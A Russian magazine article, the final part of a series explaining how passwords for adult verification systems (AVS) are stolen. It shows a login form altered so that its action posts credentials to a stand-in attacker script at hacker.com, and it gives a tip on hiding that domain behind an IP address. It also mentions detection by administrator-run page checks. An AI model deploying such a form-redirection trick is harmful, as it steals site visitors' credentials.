Главная
Новости
Статьи и обзоры
Горожанин
Обнинск в Internet
Web Design
Hardware
Software
Безопасность
Серфинг
Игродром
Relax
Технологии
Web-обзор
Интернет-ликбез
Опросник
УП-Технологии
ART.net
Ссылки
Архив
О нас
Контакты
Форумы
Основатель:
К.Николаенко
Главный Редактор:
С.Коротков
Web Design:
Neutron
![]()
![]()
![]()
![]()
![]()
![]()
![]()
|
|
= Безопасность =
КАК ВЗЛОМАТЬ AVS
Сергей Коротков korotko-f@mail.ru
по материалам www.iworld.ru
продолжение: начало в #9(121), #10(122)
После того как выбранный вариант скрипта загружен хакером на сайт, выполняется модификация формы, в которой вводится пароль, передающийся на проверку AVS, например:
<form name="Enter_ID" action="http://www.hacker.com/checkid.php" method="post">
<input type="hidden" name="page" value="2199076">
<input type="text" name="id" size"18">
<input type="submit" name="submitButtonName" value="Enter">
</form>
Обратите внимание на то, что внешний вид страницы остался прежним, а единственное внесенное изменение - перенаправление запроса аутентификации на хакерский скрипт, размещающийся по адресу http://www.hacker.com/checkid.php. Так как доменное имя, отличное от адреса сайта AVA-системы, может вызвать подозрение, обычно указывают вместо него, IP-адрес (например, http://212.5.225.10/checkid.php). IP-адрес сервера элементарно выясняется с помощью, например, стандартной команды ping (pingwww.hacker.com), входящей в любую современную операционную систему класса Windows.
В заключение стоит отметить, что противодействовать описанному способу кражи паролей, оказавшемуся универсальным для всех существующих сегодня AVS, практически НЕВОЗМОЖНО. Типичный пользователь AVS за один сеанс посещает несколько сайтов и, не будучи профессионалом, не сможет, да и не пожелает анализировать HTML-коды каждого сайта. Проблема может частично решаться на уровне системных администраторов AVS. Они могут написать и периодически запускать робот для анализа страниц с формами ввода паролей для сайтов, входящих в AVS. В результате такой проверки можно отследить модифицированные страницы, хотя этот процесс достаточно нетривиален. Тот факт, что большинство AVS не регистрируют веб-мастеров из России, не спасает отцов мировой демократии. Хакер не ставит перед собой задачу заработать долларовый чек за свой сайт, который действительно не будет выслан в Россию, но что мешает при регистрации вместо отсутствующей в списке Российской Федерации выбрать любую другую страну? С технической точки зрения - ничто!
Традиционно большинство статей завершается неким выводом - итогом, в котором автор еще раз подчеркивает значимость затронутой темы, попутно поучая подрастающее поколение и отдавая дань уважения ныне здравствующим авторитетам. Концовка должна быть оптимистичной, а будущее, к которому идем, - светлым.
Однако не все статьи можно оценить однозначно. С каждым днем к Интернету подключаются тысячи новых пользователей, и большинство из них представляют Сеть своеобразным мешком Деда Мороза с увлекательными высокотехнологичными подарками. Но порой случается, что в этом мешке спрятаны не подарки, а шило. Причем, добрый их десяток. Одно из этих "шил" и было выставлено на всеобщее обозрение. Чего его в мешке-то таить?
|
|
